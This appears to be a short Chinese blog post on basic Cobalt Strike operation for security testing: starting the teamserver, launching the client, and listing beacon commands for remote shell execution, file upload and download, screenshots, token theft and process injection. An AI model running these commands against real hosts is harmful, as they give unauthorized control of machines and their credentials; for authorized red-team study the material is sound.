安全测试中,将一台虚拟机作为服务器,同时也可以作为客户机。
1、将服务器打开
./teamserver 192.168.204.148 kali
2、启动客户端
中文插件打开:
java -Dfile.encoding=UTF-8 -javaagent:CobaltStrikeCN.jar -XX:ParallelGCThreads=4 -XX:+AggressiveHeap -XX:+UseParallelGC -jar cobaltstrike.jar英文直接打开:
java -Dfile.encoding=UTF-8 -XX:ParallelGCThreads=4 -XX:+AggressiveHeap -XX:+UseParallelGC -jar cobaltstrike.jar
3、弹出窗口后,输入IP地址和密码kali,即可弹出客户端,然后直接操作即可。
CobatStrike常用命令:
1、将这个回连的间隔设置为0,因为CS中默认回连是60秒一次交互。
sleep 0
2、等等这些cmd执行命令,我们都需要在面前加上shell。
shell whoami ipconfig hostname
3、上传下载
upload 文件路径\文件名
download 文件名
4、截屏
screenshot
5、令牌窃取和进程注入
steal_token PID
inject PID标签:免杀,encoding,kali,jar,XX,基本操作,CobatStrike From: https://www.cnblogs.com/wuruixin/p/17016652.html